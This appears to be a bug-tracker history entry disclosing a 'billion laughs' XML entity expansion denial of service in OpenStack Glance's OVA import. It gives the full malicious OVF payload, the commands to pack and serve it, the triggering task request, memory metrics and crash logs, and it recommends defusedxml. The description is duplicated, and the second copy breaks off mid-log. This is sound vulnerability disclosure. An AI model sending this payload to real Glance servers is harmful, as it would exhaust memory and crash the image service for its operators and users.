2016-09-20 00:23:10 |
Charles Neill |
bug |
|
|
added bug |
2016-09-20 00:25:42 |
Charles Neill |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request":
2016-09-20 00:18:50.060 12743 INFO eventlet.wsgi.server [req-7b00a8f9-9fd6-4434-9c8b-87cc88ae2c06 1fadb086cfd94c1d8ab9d554657054d1 3330be90ba344c34b34afc27de7e7195 - default default] 10.0.2.2 - - [20/Sep/2016 00:18:50] "POST /v2/tasks HTTP/1.1" 201 796 4.892790
2016-09-20 00:18:50.076 12743 INFO glance.domain [-] Task [6da2d2bc-0bf1-4063-be3c-f571a3f8bcac] status changing from processing to processing
2016-09-20 00:18:50.083 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: dcc1e3e9d69e4e69a3f1f3737fe62040 NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.120 12743 DEBUG glance.async.taskflow_executor [-] Taskflow executor picked up the execution of task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac of task type import _run /opt/stack/glance/glance/async/taskflow_executor.py:152
2016-09-20 00:18:50.202 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.sheepdog.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.204 12743 DEBUG glance_store.backend [-] Attempting to import store rbd _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.207 12743 DEBUG glance_store.backend [-] Attempting to import store http _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.210 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.214 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.http.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.215 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.rbd.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.218 12743 DEBUG glance_store.backend [-] Attempting to import store vmware _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.220 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.cinder.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.222 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.filesystem.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.223 12743 DEBUG glance_store.backend [-] Attempting to import store cinder _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.225 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.swift.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.227 12743 DEBUG glance_store.backend [-] Attempting to import store swift _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.230 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.vmware_datastore.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.233 12743 DEBUG glance_store.backend [-] Attempting to import store sheepdog _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.236 12743 DEBUG glance_store.backend [-] Attempting to import store no_conf _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.239 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.243 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.244 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.247 12743 DEBUG glance_store.capabilities [-] Store glance_store._drivers.filesystem.Store doesn't support updating dynamic storage capabilities. Please overwrite 'update_capabilities' method of the store to implement updating logics if needed. update_capabilities /usr/local/lib/python2.7/dist-packages/glance_store/capabilities.py:97
2016-09-20 00:18:50.269 12743 DEBUG glance.async.flows.introspect [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/introspect.py:92
2016-09-20 00:18:50.277 12743 DEBUG glance.async.flows.ovf_process [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/ovf_process.py:264
2016-09-20 00:18:50.691 12743 DEBUG glance.async.taskflow_executor [-] Flow 'import' (ead420f3-4e84-42e5-9a2b-c2b5752454f6) transitioned into state 'RUNNING' from state 'PENDING' _flow_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:140
2016-09-20 00:18:50.719 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.739 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property status for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.740 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property schema for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.742 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property file for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.745 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property direct_url for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.751 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property tags for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [4]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request":
2016-09-20 00:18:50.060 12743 INFO eventlet.wsgi.server [req-7b00a8f9-9fd6-4434-9c8b-87cc88ae2c06 1fadb086cfd94c1d8ab9d554657054d1 3330be90ba344c34b34afc27de7e7195 - default default] 10.0.2.2 - - [20/Sep/2016 00:18:50] "POST /v2/tasks HTTP/1.1" 201 796 4.892790
2016-09-20 00:18:50.076 12743 INFO glance.domain [-] Task [6da2d2bc-0bf1-4063-be3c-f571a3f8bcac] status changing from processing to processing
2016-09-20 00:18:50.083 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: dcc1e3e9d69e4e69a3f1f3737fe62040 NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.120 12743 DEBUG glance.async.taskflow_executor [-] Taskflow executor picked up the execution of task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac of task type import _run /opt/stack/glance/glance/async/taskflow_executor.py:152
2016-09-20 00:18:50.202 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.sheepdog.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.204 12743 DEBUG glance_store.backend [-] Attempting to import store rbd _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.207 12743 DEBUG glance_store.backend [-] Attempting to import store http _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.210 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.214 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.http.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.215 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.rbd.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.218 12743 DEBUG glance_store.backend [-] Attempting to import store vmware _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.220 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.cinder.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.222 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.filesystem.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.223 12743 DEBUG glance_store.backend [-] Attempting to import store cinder _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.225 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.swift.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.227 12743 DEBUG glance_store.backend [-] Attempting to import store swift _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.230 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.vmware_datastore.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.233 12743 DEBUG glance_store.backend [-] Attempting to import store sheepdog _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
